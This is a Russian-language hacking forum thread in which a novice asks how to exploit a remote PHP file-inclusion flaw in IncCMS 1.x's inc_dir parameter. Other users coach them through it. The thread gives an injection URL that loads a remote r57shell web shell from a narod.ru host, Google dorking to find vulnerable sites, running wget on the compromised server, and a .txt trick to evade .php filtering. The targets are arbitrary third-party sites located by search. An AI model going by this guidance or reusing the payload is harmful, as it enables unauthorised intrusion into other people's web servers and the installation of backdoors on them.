Поиск  Пользователи  Правила 
Закрыть
Логин:
Пароль:
Забыли свой пароль?
Войти
 
Страницы: 1
RSS
использование новых уязвимочтей
 
подскажите пожалуйста, как использовать новые уязвимости.
Вот например:

IncCMS 1.x

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.

Уязвимость существует из-за недостаточной обработки входных данных в параметре "inc_dir" в сценарии inc/settings.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Пример:

http://[host]/[incCMS_path]/inc/settings.php?inc_dir=[file]

не понимаю, что нужно подставлять вместо    /[incCMS_path]/inc/settings.php?inc_dir
:cry:
и как эту уязвимость искать в google?  powered by  IncCMS 1.x ? :cry:
 
Пойми, для начала, в чем суть уязвимости, тогда подобные вопросы отпадут.
 
Google Hacking изучи.
 
я не понимаю, правильно ли я делаю:

набираю в google " Powered by IncCMS 1.x"
затем подставляю, напримет  
www somesite/   incCMS_path]/inc/settings.php?inc_dir=http://*.narod.ru/r57shell.php

и чего? и ничего! ничего не получается!!!
 :cry:
 
нет, неверно, так как в запросе следует указывать спец.слова, например filetype: , inurl: и т.п.
К прочтению и изучению:
http://www.google.com/intl/xx-hacker/
http://johnny.ihackstuff.com/security/premium/The_Google_Hackers_Guide_v1.0.pdf

Также есть программа Google Hacker и аддон к мозиле позволяющий моментально это искать.
 
Цитата
vika gfrtg пишет:
затем подставляю, напримет
www somesite/ incCMS_path]/inc/settings.php?inc_dir=http://*.narod.ru/r57shell.php
А ты уверен что в inc_dir нужно именно это передавать? Может быть нужно только путь до файла, а сам файл назвать определенным образом? Если есть возможность, смотри исходник скрипта, или пробуй разные варианты.
 
Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера

Попробуй выполнить команды утилитами на сервере (wget), и т.п.
иногда осществлятся фильтрация .php, поэтому стоит проверить инклуд перенаправлением не на .php файл, а .txt
Страницы: 1
Читают тему